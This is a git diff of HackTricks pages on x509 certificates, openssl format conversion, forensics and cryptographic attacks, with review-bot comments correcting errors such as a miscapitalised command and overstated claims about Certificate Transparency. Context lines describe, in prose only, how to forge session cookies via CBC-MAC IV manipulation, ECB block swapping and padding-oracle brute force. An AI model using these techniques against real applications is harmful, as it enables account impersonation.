A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.\ -From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm). +- **Version Number** signifies the x509 format's version. +- **Serial Number** uniquely identifies the certificate within a Certificate Authority's (CA) system, mainly for revocation tracking. +- The **Subject** field represents the certificate's owner, which could be a machine, an individual, or an organization. It includes detailed identification such as: + - **Common Name (CN)**: Domains covered by the certificate. + - **Country (C)**, **Locality (L)**, **State or Province (ST, S, or P)**, **Organization (O)**, and **Organizational Unit (OU)** provide geographical and organizational details. + - **Distinguished Name (DN)** encapsulates the full subject identification. +- **Issuer** details who verified and signed the certificate, including similar subfields as the Subject for the CA. +- **Validity Period** is marked by **Not Before** and **Not After** timestamps, ensuring the certificate is not used before or after a certain date. +- The **Public Key** section, crucial for the certificate's security, specifies the algorithm, size, and other technical details of the public key. +- **x509v3 extensions** enhance the certificate's functionality, specifying **Key Usage**, **Extended Key Usage**, **Subject Alternative Name**, and other properties to fine-tune the certificate's application. -### What is Certificate Transparency +#### **Key Usage and Extensions** -Certificate Transparency aims to remedy certificate-based threats by **making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users**. 
Specifically, Certificate Transparency has three main goals: +- **Key Usage** identifies cryptographic applications of the public key, like digital signature or key encipherment. +- **Extended Key Usage** further narrows down the certificate's use cases, e.g., for TLS server authentication. +- **Subject Alternative Name** and **Basic Constraint** define additional host names covered by the certificate and whether it's a CA or end-entity certificate, respectively. +- Identifiers like **Subject Key Identifier** and **Authority Key Identifier** ensure uniqueness and traceability of keys. +- **Authority Information Access** and **CRL Distribution Points** provide paths to verify the issuing CA and check certificate revocation status. +- **CT Precertificate SCTs** offer transparency logs, crucial for public trust in the certificate. -* Make it impossible (or at least very difficult) for a CA to **issue a SSL certificate for a domain without the certificate being visible to the owner** of that domain. -* Provide an **open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or maliciously** issued. -* **Protect users** (as much as possible) from being duped by certificates that were mistakenly or maliciously issued. 
+```python +# Example of accessing and using x509 certificate fields programmatically: +from cryptography import x509 +from cryptography.hazmat.backends import default_backend + +# Load an x509 certificate (assuming cert.pem is a certificate file) +with open("cert.pem", "rb") as file: + cert_data = file.read() + certificate = x509.load_pem_x509_certificate(cert_data, default_backend()) + +# Accessing fields +serial_number = certificate.serial_number +issuer = certificate.issuer +subject = certificate.subject +public_key = certificate.public_key() + +print(f"Serial Number: {serial_number}") +print(f"Issuer: {issuer}") +print(f"Subject: {subject}") +print(f"Public Key: {public_key}") +``` + +### **Difference between OCSP and CRL Distribution Points** + +**OCSP** (**RFC 2560**) involves a client and a responder working together to check if a digital public-key certificate has been revoked, without needing to download the full **CRL**. This method is more efficient than the traditional **CRL**, which provides a list of revoked certificate serial numbers but requires downloading a potentially large file. CRLs can include up to 512 entries. More details are available [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm). + +### **What is Certificate Transparency** + +Certificate Transparency helps combat certificate-related threats by ensuring the issuance and existence of SSL certificates are visible to domain owners, CAs, and users. Its objectives are: + +* Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge. +* Establishing an open auditing system for tracking mistakenly or maliciously issued certificates. +* Safeguarding users against fraudulent certificates. #### **Certificate Logs** -Certificate logs are simple network services that maintain **cryptographically assured, publicly auditable, append-only records of certificates**. 
**Anyone can submit certificates to a log**, although certificate authorities will likely be the foremost submitters. Likewise, anyone can query a log for a cryptographic proof, which can be used to verify that the log is behaving properly or verify that a particular certificate has been logged. The number of log servers doesn’t have to be large (say, much less than a thousand worldwide), and each could be operated independently by a CA, an ISP, or any other interested party. +Certificate logs are publicly auditable, append-only records of certificates, maintained by network services. These logs provide cryptographic proofs for auditing purposes. Both issuance authorities and the public can submit certificates to these logs or query them for verification. While the exact number of log servers is not fixed, it's expected to be less than a thousand globally. These servers can be independently managed by CAs, ISPs, or any interested entity. -#### Query +#### **Query** -You can query the logs of Certificate Transparency of any domain in [https://crt.sh/](https://crt.sh). +To explore Certificate Transparency logs for any domain, visit [https://crt.sh/](https://crt.sh). -## Formats +Different formats exist for storing certificates, each with its own use cases and compatibility. This summary covers the main formats and provides guidance on converting between them. -There are different formats that can be used to store a certificate. +## **Formats** -#### **PEM Format** +### **PEM Format** +- Most widely used format for certificates. +- Requires separate files for certificates and private keys, encoded in Base64 ASCII. +- Common extensions: .cer, .crt, .pem, .key. +- Primarily used by Apache and similar servers. 
-* It is the most common format used for certificates -* Most servers (Ex: Apache) expects the certificates and private key to be in a separate files\ - \- Usually they are Base64 encoded ASCII files\ - \- Extensions used for PEM certificates are .cer, .crt, .pem, .key files\ - \- Apache and similar server uses PEM format certificates +### **DER Format** +- A binary format of certificates. +- Lacks the "BEGIN/END CERTIFICATE" statements found in PEM files. +- Common extensions: .cer, .der. +- Often used with Java platforms. -#### **DER Format** +### **P7B/PKCS#7 Format** +- Stored in Base64 ASCII, with extensions .p7b or .p7c. +- Contains only certificates and chain certificates, excluding the private key. +- Supported by Microsoft Windows and Java Tomcat. -* The DER format is the binary form of the certificate -* All types of certificates & private keys can be encoded in DER format -* DER formatted certificates do not contain the "BEGIN CERTIFICATE/END CERTIFICATE" statements -* DER formatted certificates most often use the ‘.cer’ and '.der' extensions -* DER is typically used in Java Platforms +### **PFX/P12/PKCS#12 Format** +- A binary format that encapsulates server certificates, intermediate certificates, and private keys in one file. +- Extensions: .pfx, .p12. +- Mainly used on Windows for certificate import and export. 
-#### **P7B/PKCS#7 Format** +### **Converting Formats** -* The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c -* A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key -* The most common platforms that support P7B files are Microsoft Windows and Java Tomcat +**PEM conversions** are essential for compatibility: -#### **PFX/P12/PKCS#12 Format** +- **x509 to PEM** -* The PKCS#12 or PFX/P12 format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file -* These files usually have extensions such as .pfx and .p12 -* They are typically used on Windows machines to import and export certificates and private keys - -### Formats conversions - -**Convert x509 to PEM** - -``` +```bash openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem ``` -#### **Convert PEM to DER** -``` +- **PEM to DER** +```bash openssl x509 -outform der -in certificatename.pem -out certificatename.der ``` -**Convert DER to PEM** -``` +- **DER to PEM** +```bash openssl x509 -inform der -in certificatename.der -out certificatename.pem ``` -**Convert PEM to P7B** - -**Note:** The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c. A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key. The most common platforms that support P7B files are Microsoft Windows and Java Tomcat. - -``` +- **PEM to P7B** +```bash openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer ``` -**Convert PKCS7 to PEM** -``` +- **PKCS7 to PEM** +```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem ``` -**Convert pfx to PEM** -**Note:** The PKCS#12 or PFX format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file. 
PFX files usually have extensions such as .pfx and .p12. PFX files are typically used on Windows machines to import and export certificates and private keys. +**PFX conversions** are crucial for managing certificates on Windows: -``` +- **PFX to PEM** +```bash openssl pkcs12 -in certificatename.pfx -out certificatename.pem ``` -**Convert PFX to PKCS#8**\ -**Note:** This requires 2 commands -**1- Convert PFX to PEM** +- **PFX to PKCS#8** involves two steps: + 1. Convert PFX to PEM -``` +```bash openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem ``` -**2- Convert PEM to PKCS8** - -``` + 2. Convert PEM to PKCS8 +```bash openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8 ``` -**Convert P7B to PFX**\ -**Note:** This requires 2 commands -1- **Convert P7B to CER** - -``` +- **P7B to PFX** also requires two commands: + 1. Convert P7B to CER +```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer ``` -**2- Convert CER and Private Key to PFX** + 2. Convert CER and Private Key to PFX +```bash +openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer +``` -``` -openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer -``` +***
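Review bot: the "PFX to PKCS#8" step 2 in this hunk now presents `openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8` inside a `bash` fence, and the capitalised binary name fails with "command not found" on case-sensitive systems; change it to `openssl pkcs8 ...` while the line is being touched. Two wording changes alter meaning: the first Certificate Transparency objective now reads "Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge", but CT does not prevent issuance, it makes issuance visible after the fact, which is what the removed line ("impossible (or at least very difficult) ... without the certificate being visible to the owner") said; suggest "Making it very difficult for a CA to issue a certificate for a domain without that issuance being visible to the domain owner." In the OCSP/CRL paragraph, "CRLs can include up to 512 entries" is stated as a general property, but the figure comes from the linked ArubaOS documentation and describes that product's CRL handling; X.509/RFC 5280 impose no such limit, so attribute the number to Aruba or drop it. Structure: the sentence "Different formats exist for storing certificates..." is added under `#### **Query**` before the `## **Formats**` heading it introduces, so move it below that heading; `### **Common Fields in x509 Certificates**` now sits directly under the unchanged `## x509 Common Fields`, so one of the two is redundant; and the nested steps (` 1. Convert PFX to PEM` followed by a fence at column 0, then ` 2. Convert PEM to PKCS8`) will not render as one numbered list, so either indent the fences under the list items or drop the nesting. For the added Python block: the `backend` argument of `load_pem_x509_certificate` is optional in current `cryptography` releases, `print(f"Public Key: {public_key}")` prints only the object repr rather than the key (use `public_key.public_bytes(serialization.Encoding.PEM, serialization.PublicFormat.SubjectPublicKeyInfo)` from `cryptography.hazmat.primitives`), and since the surrounding section is about the v3 extensions it would be more useful to show `certificate.extensions` than the serial number alone.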
diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index ec3713216..bbe30b004 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md 
@@ -21,11 +21,11 @@ If the **cookie** is **only** the **username** (or the first part of the cookie # CBC-MAC -In cryptography, a **cipher block chaining message authentication code** (**CBC-MAC**) is a technique for constructing a message authentication code from a block cipher. The message is encrypted with some block cipher algorithm in CBC mode to create a **chain of blocks such that each block depends on the proper encryption of the previous block**. This interdependence ensures that a **change** to **any** of the plaintext **bits** will cause the **final encrypted block** to **change** in a way that cannot be predicted or counteracted without knowing the key to the block cipher. +**Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security. -To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. The following figure sketches the computation of the CBC-MAC of a message comprising blocks![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E: +To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. 
The following figure sketches the computation of the CBC-MAC of a message comprising blocks![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E: -![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) +![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) # Vulnerability @@ -63,7 +63,7 @@ If you can control the used IV the attack could be very easy.\ If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\ Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**. -# References +## References More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md index 02b71f45a..4ddaf5d47 100644 --- a/cryptography/electronic-code-book-ecb.md +++ b/cryptography/electronic-code-book-ecb.md 
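Review bot: the first hunk replaces the alt text of both images with their URLs, which loses the only textual form of the notation: the formula image's alt was `m_1||m_2||...||m_x`, so the sentence "a message comprising blocks ... using a secret key k" is now unreadable without the image, and "CBC-MAC structure" becomes a URL; keep the descriptive alt text (`![m_1||m_2||...||m_x](...)`, `![CBC-MAC structure](...)`) and only fix the escaping if that was the goal. The rewritten definition also changes the security claim: "To make or reverse such a change, the encryption key is required, ensuring security" is wrong, since anyone can flip plaintext bits; what needs the key is predicting or compensating for the effect on the final block, which is what the removed sentence ("cannot be predicted or counteracted without knowing the key") stated. As written the new sentence also contradicts the page's own Vulnerability section (unchanged context in the second hunk), which shows the MAC being manipulated without the key when the IV is attacker-controlled; restore the original wording of that clause.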
@@ -80,9 +80,9 @@ So, another way to impersonate the user `admin` would be to: The cookie of this user is going to be composed by 3 blocks: the first 2 is the blocks of the username + delimiter and the third one of the password (which is faking the username): `username |admin ` -** Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`** +**Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`** -# References +## References * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index 4f75fe3ad..59c28f7cf 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md @@ -44,7 +44,7 @@ If an attacker wants to append the string "append" he can: {% embed url="https://github.com/iagox86/hash_extender" %} -# References +## References You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md index 890262fb3..4a5994b5c 100644 --- a/cryptography/padding-oracle-priv.md +++ b/cryptography/padding-oracle-priv.md 
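Review bot: the bold-marker fix in the electronic-code-book hunk is correct, but the `+` line still reads "replace the first block with the last time", which should be "the last one" (the third block, the one holding the password that spells the target username, as the preceding context line explains); since the line is already being rewritten, fix the wording in the same change. The hash-length-extension hunk is a heading-level change only and is fine.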
@@ -19,11 +19,11 @@ Other ways to support HackTricks: In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: -![CBC encryption](https://defuse.ca/images/cbc\_encryption.png) +![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png) To decrypt CBC the **opposite** **operations** are done: -![CBC decryption](https://defuse.ca/images/cbc\_decryption.png) +![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png) Notice how it's needed to use an **encryption** **key** and an **IV**. @@ -114,7 +114,7 @@ If you **log in many times** and always get the **same cookie**, there is probab Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\ But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster. -# References +## References * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) diff --git a/forensics/basic-forensic-methodology/README.md b/forensics/basic-forensic-methodology/README.md index 753613771..4368eb8dd 100644 --- a/forensics/basic-forensic-methodology/README.md +++ b/forensics/basic-forensic-methodology/README.md 
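Review bot: in the first padding-oracle hunk the image alt text "CBC encryption" and "CBC decryption" is replaced by the image URL, so the two diagrams are no longer distinguishable in text-only or screen-reader rendering even though the sentences around them ("the previous encrypted block is used as IV" / "the opposite operations are done") depend on knowing which is which; keep the descriptive alt text and change only the URL escaping if that was the intent. The same alt-text-to-URL substitution appears in the cipher-block-chaining hunk of this commit, so it looks like a scripted replacement rather than a deliberate edit.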
@@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. 
@@ -96,7 +96,7 @@ Keep in mind the possible use of anti-forensic techniques: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 15171ca4e..4e75ea70e 100644 --- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md 
@@ -34,7 +34,7 @@ File Integrity Monitoring (FIM) is a critical security technique that protects I * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) -# References +## References * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md index f2ca64897..63033cf01 100644 --- a/forensics/basic-forensic-methodology/linux-forensics.md +++ b/forensics/basic-forensic-methodology/linux-forensics.md 
@@ -456,7 +456,7 @@ Do you work in a **cybersecurity company**? Do you want to see your **company ad * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md index 67786fa78..226b1ab1d 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md 
@@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. 
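Review bot: this footer hunk in memory-dump-analysis/README.md (and the identical ones in the same file at line 66, in image-acquisition-and-mount.md and in tunneling-and-port-forwarding.md) only unbolds the bird emoji, `**🐦**` to `🐦`, and keeps "follow me on Twitter", whereas the linux-hardening footers changed in this same PR switch to "follow us on Twitter" and point the link at `hacktricks_live`. Since these lines are already being edited, align them with the rest of the PR so the repository does not end up with two different footers.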
@@ -66,7 +66,7 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth** * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index 1c1306567..1db184503 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md 
@@ -175,7 +175,7 @@ Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftw These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers. -# References +## References * [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a) * [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/) * [https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 6d573a124..4dced7582 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -23,7 +23,7 @@ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -**For further details check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)** +For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary: Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents. 
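Review bot: the added line in office-file-analysis.md has a typo, "This is just a sumary:" should read "This is just a summary:". Separately, the unchanged context line that follows lists RTF among the "OLE formats (like RTF, DOC, XLS, PPT)"; RTF is a plain-text markup format rather than an OLE compound file (it can embed OLE objects, which is how it carries malicious payloads), so that parenthetical is worth correcting while this paragraph is being touched.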
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 013cdb016..135dd23f0 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -24,7 +24,7 @@ Video challenges often involve container formats that bundle audio and video str This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files. -# References +## References * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index 298e74172..16b905ce3 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md 
@@ -26,7 +26,7 @@ The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestud It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data. -# References +## References * [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md index 7192141db..48f3dcee9 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
